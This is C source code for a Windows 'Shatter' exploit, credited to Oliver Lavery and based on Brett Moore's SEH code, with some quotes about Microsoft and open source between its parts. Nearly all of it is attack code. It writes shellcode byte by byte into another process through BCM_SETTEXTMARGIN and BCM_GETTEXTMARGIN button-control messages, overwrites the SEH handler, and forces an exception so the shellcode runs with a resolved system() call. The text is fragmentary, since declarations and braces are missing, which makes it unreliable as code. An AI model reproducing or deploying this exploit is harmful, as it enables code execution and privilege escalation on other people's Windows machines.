//"Should there be a reason to believe that code that comes from a variety
//of people, unknown from around the world, should be somehow of higher quality
//than that from people who get paid to do it professionally?"
// - Steve Ballmer // (Hey, wait, are MS employees generally household names?
// Isn't MS an equal opportunity employer?)
int main(int argc, char *argv[])
long hWnd;
DWORD ProcAddr;
printf("%% Playing with CommCtrl 6.0 messages\n");
printf("%% Oliver Lavery.\n\n");
printf("%% based on Shatter SEH code by\n");
printf("%% brett moore security-assessment com\n\n");
// Find local procedure address
hMod = LoadLibrary("kernel32.dll");
ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA");
if(ProcAddr != 0)
// And put it in our shellcode
*(long *)&exploit[13] = ProcAddr;
hMod = LoadLibrary("msvcrt.dll");
ProcAddr = (DWORD)GetProcAddress(hMod, "system");
if(ProcAddr != 0)
// And put it in our shellcode
*(long *)&exploit[26] = ProcAddr;
printf("+ Finding %s Window...\n",tWindow);
hWnd = (long)FindWindow(NULL,tWindow);
if(hWnd == NULL)
printf("+ Couldn't Find %s Window\n",tWindow);
return 0;
printf("+ Found Main Window At...0x%xh\n",hWnd);
printf("+ Not Done...\n");
return 0;
void *FindByteInKernel32( BYTE byte )
while ( addr < KERN32_TOP_ADDR ) {
if ( *addr == byte ) return addr;
ErrorTrace( "Couldn't find a shellcode byte in kernel32. Sorry.", 0 );
//"Should there be any reason to believe that a relatively small group of
//paid programmers working under the direction of a marketing machine can produce
//code approaching the quality of a global team linked by the internet, whose
//every line of code is subject to ruthless peer review, and whose only standard
//is excellence?"
// - crunchie812
void doWrite(HWND hWnd, BYTE tByte, BYTE *address)
void *byte_addr;
byte_addr = FindByteInKernel32( tByte );
SendMessage( hWnd,(UINT) BCM_SETTEXTMARGIN,0,(LPARAM)byte_addr);
if ( !SendMessage( hWnd, (UINT)BCM_GETTEXTMARGIN, 0, (LPARAM)address) ) {
ErrorTrace( "error", GetLastError() );
void IterateWindows(long hWnd)
long childhWnd,looper;
childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) );
while ( strcmp(g_classNameBuf, "Button") )
// IterateWindows(childhWnd);
childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) );
if(childhWnd != NULL)
printf("+ Found button control..0x%xh\n",childhWnd);
// Inject shellcode to known address
printf("+ Sending shellcode to...0x%xh\n", SHELLCODE_ADDR);
for (looper=0;looper<sizeof(exploit);looper++)
doWrite((HWND)childhWnd, exploit[looper],(BYTE *)(SHELLCODE_ADDR + looper));
// Overwrite SEH
printf("+ Overwriting Top SEH....0x%xh\n", SEH_HANDLER_ADDR);
doWrite((HWND)childhWnd, ((SHELLCODE_ADDR) & 0xff), (BYTE *)SEH_HANDLER_ADDR);
doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 8) & 0xff), (BYTE *)SEH_HANDLER_ADDR+1);
doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 16) & 0xff), (BYTE *)SEH_HANDLER_ADDR+2);
doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 24) & 0xff), (BYTE *)SEH_HANDLER_ADDR+3);
// Cause exception
printf("+ Forcing Unhandled Exception\n");
doWrite((HWND)childhWnd, 1, (BYTE *)0xDEADBEEF);
printf("+ Done...\n");
--- CUT - HERE ---